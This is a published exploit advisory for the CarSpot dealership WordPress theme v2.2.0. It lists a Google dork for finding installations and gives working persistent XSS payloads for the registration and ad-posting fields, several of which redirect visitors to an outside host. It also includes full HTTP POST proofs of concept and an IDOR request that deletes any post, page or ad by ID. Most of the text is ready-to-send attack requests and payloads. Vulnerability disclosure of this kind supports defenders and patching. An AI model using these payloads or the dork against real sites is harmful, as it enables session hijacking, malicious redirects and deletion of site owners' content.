# Exploit Title: CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/carspot/
# Date: 14/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://scriptsbundle.com/
# Software Link: https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539
# Version: 2.2.0
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 639
----[]- Info: -[]----
Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/
----[]- Persistent XSS -> Registration Form/User Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input field: «Mobile Number».
Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_
action=sb_register_user&sb_data=sb_reg_name%3Dm0ze%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%252F%252F%2522%253E%26sb_reg_contact%3D%2522%253E%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%253Bwindow.location%253D%2560https%253A%252F%252Fm0ze.ru%2560%253B%252F%252F%2522%253E%26sb_reg_email%3Dm0ze%2540was.here%26sb_reg_password%3Dasdasd%26sb_user_type%3Ddealer%26minimal-checkbox-1%3Don%26is_captcha%3Dno
----[]- Persistent XSS -> Ad Post -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».
Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_
action=sb_ad_posting&sb_data=ad_title=PoC&is_update=&is_level=&country_level=&ad_cat=62&ad_cat_id=227&ad_cat_sub=227&ad_cat_sub_sub=228&ad_price=1337&ad_price_type=Fixed&ad_avg_hwy=1337&ad_avg_city=1337&ad_mileage=1337&_carspot_ad_condition=166%7CNew&_carspot_ad_type=76%7CBuy&_carspot_ad_warranty=248%7CYes&_carspot_ad_years=36%7C2013&_carspot_ad_body_types=118%7CHatchback&_carspot_ad_transmissions=67%7CAutomatic&_carspot_ad_engine_capacities=44%7C3500&_carspot_ad_engine_types=126%7CHybrid&_carspot_ad_assembles=131%7CImported&_carspot_ad_colors=69%7CBlack&_carspot_ad_insurance=247%7CYes&ad_features%5B%5D=Cool+Box&ad_yvideo=&tags=&ad_description=PoC&sb_total_extra=0&ad_country=230&ad_country_id=293&ad_country_states=293&sb_user_name=m0ze&sb_contact_number=%22%3E%3C!--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D(alert)(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%22%3E&sb_user_address=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Address%60)%2F%2F%22%3E&ad_map_lat=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Latitude%60)%2F%2F%22%3E&ad_map_long=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Longitude%60)%2F%2F%22%3E&sb_make_it_feature=on&is_update=
----[]- IDOR: -[]----
Delete any post/page/ad:
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_
action=sb_remove_ad&ad_id=XXXX
Where:
ad_id=XXXX - page/post/ad unique WordPress ID, can be discovered as a page class for <body> tag.
Response:
HTTP/1.1 200 OK
...
1|Ad removed successfully.